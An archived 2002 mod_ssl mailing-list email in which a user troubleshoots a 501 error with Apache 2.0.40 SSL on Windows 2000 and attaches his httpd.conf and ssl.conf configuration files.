Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Tue, 3 Sep 2002 13:11:50 -0500
Received: from doorstop (doorstop.mayo.edu [129.176.212.87])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with SMTP id NAA24489
	for ; Tue, 3 Sep 2002 13:12:21 -0500 (CDT)
From: "Paul Bleimeyer" 
To: 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Date: Tue, 3 Sep 2002 13:08:48 -0500
Message-Id: <01e401c25374$f3b96340$57d4b081@doorstop>
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_01E5_01C2534B.0AE35B40"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul Bleimeyer" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01E5_01C2534B.0AE35B40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Andre,

I think I am hitting a wall somewhere. Somewhat the same errors running your
code. Could it be my browser? Connections over 80 and 443 are fine, but when
I
invoke ssl via https://localhost or the server name I get the internal 501
error code. I shutdown my copy, renamed the folder to apache2.old inserted
yours, copied my ssl folder over with my key and cert in it and edited
http.conf and ssl.conf to reflect my directory structure. Any Ideas here? I
think I am tired, since I can't seem to figure out what's amiss here.

here is my http.conf and ssl.conf files for reference.



Access log still shows:
127.0.0.1 - - [03/Sep/2002:13:00:37 -0500] "€L" 501 288

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Andre Schild
> Sent: Tuesday, September 03, 2002 10:25 AM
> To: modssl-users@modssl.org
> Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
>
>
> >Has anyone successfully implemented mod_sll under 2.40
> apache for w2k?
> >I am getting a 501 1051 internal server error back. The ssl engine is
> >loading
> >but no response when I connect to the port.
>
> 2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
> Did compile it from the scratch...
>
> Binaries are here:
> http://www.switzerland.net/Pneatec/
>
> André
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_NextPart_000_01E5_01C2534B.0AE35B40
Content-Type: text/plain;
	name="httpd.conf"
Content-Disposition: attachment;
	filename="httpd.conf"
Content-Transfer-Encoding: quoted-printable

#
# Based upon the NCSA server configuration files originally by Rob =
McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See  for detailed information =
about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are =
unsure
# consult the online docs. You have been warned. =20
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process =
as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' =
server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), =
the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
# with ServerRoot set to "C:/Apache2" will be interpreted by the
# server as "C:/Apache2/logs/foo.log".
#
# NOTE: Where filenames are specified, you must use forward slashes
# instead of backslashes (e.g., "c:/apache" instead of "c:\apache").
# If a drive letter is omitted, the drive on which Apache.exe is located
# will be used by default.  It is recommended that you always supply
# an explicit drive letter in absolute paths, however, to avoid
# confusion.
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation
# (available at =
);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "C:/program files/Apache Group/Apache2"

#
# ScoreBoardFile: File used to store internal server process =
information.
# If unspecified (the default), the scoreboard will be stored in an
# anonymous shared memory segment, and will be unavailable to =
third-party
# applications.
# If specified, ensure that no two invocations of Apache share the same
# scoreboard file. The scoreboard file MUST BE STORED ON A LOCAL DISK.
#
#ScoreBoardFile logs/apache_runtime_status

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
#
PidFile logs/httpd.pid

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from =
the
# same client on the same connection.
#
KeepAliveTimeout 15

##
## Server-Pool Size Regulation (MPM specific)
##=20

# WinNT MPM
# ThreadsPerChild: constant number of worker threads in the server =
process
# MaxRequestsPerChild: maximum  number of requests a server process =
serves

ThreadsPerChild 250
MaxRequestsPerChild  0


#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, in addition to the default. See also the 
# directive.
#
# Change this to Listen on specific IP addresses as shown below to=20
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
#
#Listen 12.34.56.78:80
Listen 80
Listen 443

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a =
DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are =
used.
# Statically compiled modules (those listed by `httpd -l') do not need
# to be loaded here.
#
# Example:
# LoadModule foo_module modules/mod_foo.so
#
LoadModule access_module modules/mod_access.so
LoadModule actions_module modules/mod_actions.so
LoadModule alias_module modules/mod_alias.so
LoadModule asis_module modules/mod_asis.so
LoadModule auth_module modules/mod_auth.so
#LoadModule auth_anon_module modules/mod_auth_anon.so
#LoadModule auth_dbm_module modules/mod_auth_dbm.so
#LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule autoindex_module modules/mod_autoindex.so
#LoadModule cern_meta_module modules/mod_cern_meta.so
LoadModule cgi_module modules/mod_cgi.so
#LoadModule dav_module modules/mod_dav.so
#LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule dir_module modules/mod_dir.so
LoadModule env_module modules/mod_env.so
#LoadModule expires_module modules/mod_expires.so
#LoadModule file_cache_module modules/mod_file_cache.so
#LoadModule headers_module modules/mod_headers.so
LoadModule imap_module modules/mod_imap.so
LoadModule include_module modules/mod_include.so
#LoadModule info_module modules/mod_info.so
LoadModule isapi_module modules/mod_isapi.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule mime_module modules/mod_mime.so
#LoadModule mime_magic_module modules/mod_mime_magic.so
#LoadModule proxy_module modules/mod_proxy.so
#LoadModule proxy_connect_module modules/mod_proxy_connect.so
#LoadModule proxy_http_module modules/mod_proxy_http.so
#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule negotiation_module modules/mod_negotiation.so
#LoadModule rewrite_module modules/mod_rewrite.so
LoadModule setenvif_module modules/mod_setenvif.so
#LoadModule speling_module modules/mod_speling.so
#LoadModule status_module modules/mod_status.so
#LoadModule unique_id_module modules/mod_unique_id.so
LoadModule userdir_module modules/mod_userdir.so
#LoadModule usertrack_module modules/mod_usertrack.so
#LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule ssl_module modules/mod_ssl.so

#
# ExtendedStatus controls whether Apache will generate "full" status
# information (ExtendedStatus On) or just basic information =
(ExtendedStatus
# Off) when the "server-status" handler is called. The default is Off.
#
#ExtendedStatus On

### Section 2: 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
#  definition.  These values also provide defaults for
# any  containers you may define later in the file.
#
# All of these directives may appear inside  containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#

#
# ServerAdmin: Your address, where problems with the server should be
# e-mailed.  This address appears on some server-generated pages, such
# as error documents.  e.g. admin@your-domain.com
#
ServerAdmin paulb@mayo.edu

#
# ServerName gives the name and port that the server uses to identify =
itself.
# This can often be determined automatically, but we recommend you =
specify
# it explicitly to prevent problems during startup.
#
# If this is not set to valid DNS name for your host, server-generated
# redirections will not work.  See also the UseCanonicalName directive.
#
# If your host doesn't have a registered DNS name, enter its IP address =
here.
# You will have to access it by its address anyway, and this will make=20
# redirections work in a sensible way.
#
ServerName localhost:80

#
# UseCanonicalName: Determines how Apache constructs self-referencing=20
# URLs and the SERVER_NAME and SERVER_PORT variables.
# When set "Off", Apache will use the Hostname and Port supplied
# by the client.  When set "On", Apache will use the value of the
# ServerName directive.
#
UseCanonicalName Off

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "C:/Program files/Apache Group/Apache2/htdocs"

#
# Each directory to which Apache has access can be configured with =
respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories).=20
#
# First, we configure the "default" to be a very restrictive set of=20
# features. =20
#

    Options FollowSymLinks
    AllowOverride None


#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#

#
# This should be changed to whatever you set DocumentRoot to.
#


#
# Possible values for the Options directive are "None", "All",
# or any combination of:
#   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI =
Multiviews
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
#
# The Options directive is both complicated and important.  Please see
# http://httpd.apache.org/docs-2.0/mod/core.html#options
# for more information.
#
    Options Indexes FollowSymLinks

#
# AllowOverride controls what directives may be placed in .htaccess =
files.
# It can be "All", "None", or any combination of the keywords:
#   Options FileInfo AuthConfig Limit
#
    AllowOverride None

#
# Controls who can get stuff from this server.
#
    Order allow,deny
    Allow from all



#
# UserDir: The name of the directory that is appended onto a user's home
# directory if a ~user request is received.  Be especially careful to =
use
# proper, forward slashes here.
#
UserDir "My Documents/My Website"

#
# Control access to UserDir directories.  The following is an example
# for a site where these directories are restricted to read-only.
#
# You must correct the path for the root to match your system's =
configured
# user directory location, e.g. "C:/WinNT/profiles/*/My Documents/My =
Website"
# or whichever, as appropriate.
#
#
#    AllowOverride FileInfo AuthConfig Limit
#    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
#    
#        Order allow,deny
#        Allow from all
#    
#    
#        Order deny,allow
#        Deny from all
#    
#

#
# DirectoryIndex: sets the file that Apache will serve if a directory
# is requested.
#
# The index.html.var file (a type-map) is used to deliver content-
# negotiated documents.  The MultiViews Option can be used for the=20
# same purpose, but it is much slower.
#
DirectoryIndex index.html index.html.var

#
# AccessFileName: The name of the file to look for in each directory
# for access control information.  See also the AllowOverride directive.
#
AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being=20
# viewed by Web clients.=20
#

    Order allow,deny
    Deny from all


#
# TypesConfig describes where the mime.types file (or equivalent) is
# to be found.
#
TypesConfig conf/mime.types

#
# DefaultType is the default MIME type the server will use for a =
document
# if it cannot otherwise determine one, such as from filename =
extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain

#
# The mod_mime_magic module allows the server to use various hints from =
the
# contents of the file itself to determine its type.  The MIMEMagicFile
# directive tells the module where the hint definitions are located.
#

    MIMEMagicFile conf/magic


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if =
people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

#
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a 
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a 
# container, that host's errors will be logged there and not here.
#
ErrorLog logs/error.log

#
# LogLevel: Control the number of messages logged to the error.log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel Debug

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" =
combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a 
# container, they will be logged here.  Contrariwise, if you *do*
# define per- access logfiles, transactions will be
# logged therein and *not* in this file.
#
CustomLog logs/access.log common

#
# If you would like to have agent and referer logfiles, uncomment the
# following directives.
#
#CustomLog logs/referer.log referer
#CustomLog logs/agent.log agent

#
# If you prefer a single logfile with access, agent, and referer =
information
# (Combined Logfile Format) you can use the following directive.
#
#CustomLog logs/access.log combined

#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (internal error documents, FTP =
directory=20
# listings, mod_status and mod_info output etc., but not CGI generated=20
# documents or custom error documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of:  On | Off | EMail
#
ServerSignature On

#
# Aliases: Add here as many aliases as you need (with no limit). The =
format is=20
# Alias fakename realname
#
# Note that if you include a trailing / on fakename then the server will
# require it to be present in the URL.  So "/icons" isn't aliased in =
this
# example, only "/icons/".  If the fakename is slash-terminated, then =
the=20
# realname must also be slash terminated, and if the fakename omits the=20
# trailing slash, the realname must also omit it.
#
# We include the /icons/ alias for FancyIndexed directory listings.  If =
you
# do not use FancyIndexing, you may comment this out.
#
Alias /icons/ "C:/Program Files/Apache Group/Apache2/icons/"


    Options Indexes MultiViews
    AllowOverride None
    Order allow,deny
    Allow from all


#
# This should be changed to the ServerRoot/manual/.  The alias provides
# the manual, even if you choose to move your DocumentRoot.  You may =
comment
# this out if you do not care for the documentation.
#
Alias /manual "C:/Program Files/Apache Group/Apache2/manual"


    Options Indexes FollowSymLinks MultiViews IncludesNoExec
    AddOutputFilter Includes html
    AllowOverride None
    Order allow,deny
    Allow from all


#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the realname directory are treated as applications and
# run by the server when requested rather than as documents sent to the =
client.
# The same rules about trailing "/" apply to ScriptAlias directives as =
to
# Alias.
#
ScriptAlias /cgi-bin/ "C:/Program Files/Apache Group/Apache2/cgi-bin/"

#
# "C:/Apache2/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#

    AllowOverride None
    Options None
    Order allow,deny
    Allow from all


#
# Redirect allows you to tell clients about documents which used to =
exist in
# your server's namespace, but do not anymore. This allows you to tell =
the
# clients where to look for the relocated document.
# Example:
# Redirect permanent /foo http://www.example.com/bar

#
# Directives controlling the display of server-generated directory =
listings.
#

#
# IndexOptions: Controls the appearance of server-generated directory
# listings.
#
IndexOptions FancyIndexing VersionSort

#
# AddIcon* directives tell the server which icon to show for different
# files or filename extensions.  These are only displayed for
# FancyIndexed directories.
#
AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip

AddIconByType (TXT,/icons/text.gif) text/*
AddIconByType (IMG,/icons/image2.gif) image/*
AddIconByType (SND,/icons/sound2.gif) audio/*
AddIconByType (VID,/icons/movie.gif) video/*

AddIcon /icons/binary.gif .bin .exe
AddIcon /icons/binhex.gif .hqx
AddIcon /icons/tar.gif .tar
AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
AddIcon /icons/a.gif .ps .ai .eps
AddIcon /icons/layout.gif .html .shtml .htm .pdf
AddIcon /icons/text.gif .txt
AddIcon /icons/c.gif .c
AddIcon /icons/p.gif .pl .py
AddIcon /icons/f.gif .for
AddIcon /icons/dvi.gif .dvi
AddIcon /icons/uuencoded.gif .uu
AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
AddIcon /icons/tex.gif .tex
AddIcon /icons/bomb.gif core

AddIcon /icons/back.gif ..
AddIcon /icons/hand.right.gif README
AddIcon /icons/folder.gif ^^DIRECTORY^^
AddIcon /icons/blank.gif ^^BLANKICON^^

#
# DefaultIcon is which icon to show for files which do not have an icon
# explicitly set.
#
DefaultIcon /icons/unknown.gif

#
# AddDescription allows you to place a short description after a file in
# server-generated indexes.  These are only displayed for FancyIndexed
# directories.
# Format: AddDescription "description" filename
#
#AddDescription "GZIP compressed document" .gz
#AddDescription "tar archive" .tar
#AddDescription "GZIP compressed tar archive" .tgz

#
# ReadmeName is the name of the README file the server will look for by
# default, and append to directory listings.
#
# HeaderName is the name of a file which should be prepended to
# directory indexes.=20
ReadmeName README.html
HeaderName HEADER.html

#
# IndexIgnore is a set of filenames which directory indexing should =
ignore
# and not include in the listing.  Shell-style wildcarding is permitted.
#
IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t

#
# AddEncoding allows you to have certain browsers (Mosaic/X 2.1+) =
uncompress
# information on the fly. Note: Not all browsers support this.
# Despite the name similarity, the following Add* directives have =
nothing
# to do with the FancyIndexing customization directives above.
#
AddEncoding x-compress Z
AddEncoding x-gzip gz tgz

#
# DefaultLanguage and AddLanguage allows you to specify the language of=20
# a document. You can then use content negotiation to give a browser a=20
# file in a language the user can understand.
#
# Specify a default language. This means that all data
# going out without a specific language tag (see below) will=20
# be marked with this one. You probably do NOT want to set
# this unless you are sure it is correct for all cases.
#
# * It is generally better to not mark a page as=20
# * being a certain language than marking it with the wrong
# * language!
#
# DefaultLanguage nl
#
# Note 1: The suffix does not have to be the same as the language
# keyword --- those with documents in Polish (whose net-standard
# language code is pl) may wish to use "AddLanguage pl .po" to
# avoid the ambiguity with the common suffix for perl scripts.
#
# Note 2: The example entries below illustrate that in some cases=20
# the two character 'Language' abbreviation is not identical to=20
# the two character 'Country' code for its country,
# E.g. 'Danmark/dk' versus 'Danish/da'.
#
# Note 3: In the case of 'ltz' we violate the RFC by using a three char
# specifier. There is 'work in progress' to fix this and get
# the reference data for rfc1766 cleaned up.
#
# Danish (da) - Dutch (nl) - English (en) - Estonian (et)
# French (fr) - German (de) - Greek-Modern (el)
# Italian (it) - Norwegian (no) - Norwegian Nynorsk (nn) - Korean (ko)
# Portugese (pt) - Luxembourgeois* (ltz)
# Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cz)
# Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
# Russian (ru) - Croatian (hr)
#
AddLanguage da .dk
AddLanguage nl .nl
AddLanguage en .en
AddLanguage et .et
AddLanguage fr .fr
AddLanguage de .de
AddLanguage he .he
AddLanguage el .el
AddLanguage it .it
AddLanguage ja .ja
AddLanguage pl .po
AddLanguage ko .ko
AddLanguage pt .pt
AddLanguage nn .nn
AddLanguage no .no
AddLanguage pt-br .pt-br
AddLanguage ltz .ltz
AddLanguage ca .ca
AddLanguage es .es
AddLanguage sv .se
AddLanguage cz .cz
AddLanguage ru .ru
AddLanguage tw .tw
AddLanguage zh-tw .tw
AddLanguage hr .hr

#
# LanguagePriority allows you to give precedence to some languages
# in case of a tie during content negotiation.
#
# Just list the languages in decreasing order of preference. We have
# more or less alphabetized them here. You probably want to change this.
#
LanguagePriority en da nl et fr de el it ja ko no pl pt pt-br ltz ca es =
sv tw

#
# ForceLanguagePriority allows you to serve a result page rather than
# MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE =
(Fallback)
# [in case no accepted languages matched the available variants]
#
ForceLanguagePriority Prefer Fallback

#
# Specify a default charset for all pages sent out. This is
# always a good idea and opens the door for future internationalisation
# of your web site, should you ever want it. Specifying it as
# a default does little harm; as the standard dictates that a page
# is in iso-8859-1 (latin1) unless specified otherwise i.e. you
# are merely stating the obvious. There are also some security
# reasons in browsers, related to javascript and URL parsing
# which encourage you to always set a default char set.
#
AddDefaultCharset ISO-8859-1

#
# Commonly used filename extensions to character sets. You probably
# want to avoid clashes with the language extensions, unless you
# are good at carefully testing your setup after each change.
# See ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets for
# the official list of charset names and their respective RFCs
#
AddCharset ISO-8859-1  .iso8859-1 .latin1
AddCharset ISO-8859-2  .iso8859-2 .latin2 .cen
AddCharset ISO-8859-3  .iso8859-3 .latin3
AddCharset ISO-8859-4  .iso8859-4 .latin4
AddCharset ISO-8859-5  .iso8859-5 .latin5 .cyr .iso-ru
AddCharset ISO-8859-6  .iso8859-6 .latin6 .arb
AddCharset ISO-8859-7  .iso8859-7 .latin7 .grk
AddCharset ISO-8859-8  .iso8859-8 .latin8 .heb
AddCharset ISO-8859-9  .iso8859-9 .latin9 .trk
AddCharset ISO-2022-JP .iso2022-jp .jis
AddCharset ISO-2022-KR .iso2022-kr .kis
AddCharset ISO-2022-CN .iso2022-cn .cis
AddCharset Big5        .Big5       .big5
# For russian, more than one charset is used (depends on client, =
mostly):
AddCharset WINDOWS-1251 .cp-1251   .win-1251
AddCharset CP866       .cp866
AddCharset KOI8-r      .koi8-r .koi8-ru
AddCharset KOI8-ru     .koi8-uk .ua
AddCharset ISO-10646-UCS-2 .ucs2
AddCharset ISO-10646-UCS-4 .ucs4
AddCharset UTF-8       .utf8

# The set below does not map to a specific (iso) standard
# but works on a fairly wide range of browsers. Note that
# capitalization actually matters (it should not, but it
# does for some browsers).
#
# See ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets
# for a list of sorts. But browsers support few.
#
AddCharset GB2312      .gb2312 .gb=20
AddCharset utf-7       .utf7
AddCharset utf-8       .utf8
AddCharset big5        .big5 .b5
AddCharset EUC-TW      .euc-tw
AddCharset EUC-JP      .euc-jp
AddCharset EUC-KR      .euc-kr
AddCharset shift_jis   .sjis

#
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
AddType application/x-tar .tgz

#
# AddHandler allows you to map certain file extensions to "handlers":
# actions unrelated to filetype. These can be either built into the =
server
# or added with the Action directive (see below)
#
# To use CGI scripts outside of ScriptAliased directories:
# (You will also need to add "ExecCGI" to the "Options" directive.)
#
#AddHandler cgi-script .cgi

#
# For files that include their own HTTP headers:
#
#AddHandler send-as-is asis

#
# For server-parsed imagemap files:
#
#AddHandler imap-file map

#
# For type maps (negotiated resources):
# (This is enabled by default to allow the Apache "It Worked" page
#  to be distributed in multiple languages.)
#
AddHandler type-map var

# Filters allow you to process content before it is sent to the client.
#
# To parse .shtml files for server-side includes (SSI):
# (You will also need to add "Includes" to the "Options" directive.)
#
#AddType text/html .shtml
#AddOutputFilter INCLUDES .shtml

#
# Action lets you define media types that will execute a script whenever
# a matching file is called. This eliminates the need for repeated URL
# pathnames for oft-used CGI file processors.
# Format: Action media/type /cgi-script/location
# Format: Action handler-name /cgi-script/location
#

#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#

#
# Putting this all together, we can internationalize error responses.
#
# We use Alias to redirect any /error/HTTP_.html.var response to
# our collection of by-error message multi-language collections.  We use =

# includes to substitute the appropriate text.
#
# You can modify the messages' appearance without changing any of the
# default HTTP_.html.var files by adding the line:
#
#   Alias /error/include/ "/your/include/path/"
#
# which allows you to create your own set of files by starting with the
# @exp_errordir@/include/ files and copying them to /your/include/path/, =

# even on a per-VirtualHost basis.  The default include files will =
display
# your Apache version number and your ServerAdmin email address =
regardless
# of the setting of ServerSignature.
#
# The internationalized error documents require mod_alias, mod_include
# and mod_negotiation.  To activate them, uncomment the following 30 =
lines.

#    Alias /error/ "@exp_errordir@/"
#
#    
#        AllowOverride None
#        Options IncludesNoExec
#        AddOutputFilter Includes html
#        AddHandler type-map var
#        Order allow,deny
#        Allow from all
#        LanguagePriority en es de fr sv
#        ForceLanguagePriority Prefer Fallback
#    
#
#    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
#    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
#    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
#    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
#    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
#    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
#    ErrorDocument 410 /error/HTTP_GONE.html.var
#    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
#    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
#    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
#    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
#    ErrorDocument 415 /error/HTTP_SERVICE_UNAVAILABLE.html.var
#    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
#    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
#    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
#    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
#    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var



#
# The following directives modify normal HTTP response behavior to
# handle known problems with browser implementations.
#
BrowserMatch "Mozilla/2" nokeepalive
BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
BrowserMatch "RealPlayer 4\.0" force-response-1.0
BrowserMatch "Java/1\.0" force-response-1.0
BrowserMatch "JDK/1\.0" force-response-1.0

#
# The following directive disables redirects on non-GET requests for
# a directory that does not include the trailing slash.  This fixes a=20
# problem with Microsoft WebFolders which does not appropriately handle=20
# redirects for folders with DAV methods.
#
BrowserMatch "Microsoft Data Access Internet Publishing Provider" =
redirect-carefully
BrowserMatch "^WebDrive" redirect-carefully

#
# Allow server status reports, with the URL of =
http://servername/server-status
# Change the ".@@DomainName@@" to match your domain to enable.
#
#
#    SetHandler server-status
#    Order deny,allow
#    Deny from all
#    Allow from .@@DomainName@@
#

#
# Allow remote server configuration reports, with the URL of
#  http://servername/server-info (requires that mod_info.c be loaded).
# Change the ".your-domain.com" to match your domain to enable.
#
#
#    SetHandler server-info
#    Order deny,allow
#    Deny from all
#    Allow from .@@DomainName@@
#

#
# Proxy Server directives. Uncomment the following lines to
# enable the proxy server:
#
#
#ProxyRequests On
#
#
#    Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#

#
# Enable/disable the handling of HTTP/1.1 "Via:" headers.
# ("Full" adds the server version; "Block" removes all outgoing Via: =
headers)
# Set to one of: Off | On | Full | Block
#
#ProxyVia On

#
# To enable the cache as well, edit and uncomment the following lines:
# (no cacheing without CacheRoot)
#
#CacheRoot "C:/Apache2/proxy"
#CacheSize 5
#CacheGcInterval 4
#CacheMaxExpire 24
#CacheLastModifiedFactor 0.1
#CacheDefaultExpire 1
#NoCache a-domain.com another-domain.edu joes.garage-sale.com

#
# End of proxy directives.

#
# Bring in additional module-specific configurations
#

    Include conf/ssl.conf



### Section 3: Virtual Hosts
#
# VirtualHost: If you want to maintain multiple domains/hostnames on =
your
# machine you can setup VirtualHost containers for them. Most =
configurations
# use only name-based virtual hosts so the server doesn't need to worry =
about
# IP addresses. This is indicated by the asterisks in the directives =
below.
#
# Please see the documentation at=20
# 
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.

#
# Use name-based virtual hosting.
#
#NameVirtualHost *

#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for requests without a known
# server name.
#
#
#    ServerAdmin webmaster@dummy-host.example.com
#    DocumentRoot /www/docs/dummy-host.example.com
#    ServerName dummy-host.example.com
#    ErrorLog logs/dummy-host.example.com-error_log
#    CustomLog logs/dummy-host.example.com-access_log common
#

------=_NextPart_000_01E5_01C2534B.0AE35B40
Content-Type: text/plain;
	name="ssl.conf"
Content-Disposition: attachment;
	filename="ssl.conf"
Content-Transfer-Encoding: quoted-printable

#
# This is the Apache server configuration file providing SSL support.
# It contains the configuration directives to instruct the server how to
# serve pages over an https connection. For detailing information about =
these=20
# directives see 
#
#   For the moment, see  for this info. =

#   The documents are still being prepared from material donated by the
#   modssl project.
#=20
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are =
unsure
# consult the online docs. You have been warned. =20
#


#   Until documentation is completed, please check =
http://www.modssl.org/
#   for additional config examples and module docmentation.  Directives
#   and features of mod_ssl are largely unchanged from the mod_ssl =
project
#   for Apache 1.3.

#
# When we also provide SSL we have to listen to the=20
# standard HTTP port (see above) and to the HTTPS port
#
Listen 443

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a =
DSO you
#    ErrorLog logs/dummy-host.example.com-error_log
#    CustomLog logs/dummy-host.example.com-access_log common
    ErrorLog logs/doorstop.mayo.edu-error_log
    CustomLog logs/doorstop.mayo.edu-access_log common


##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#
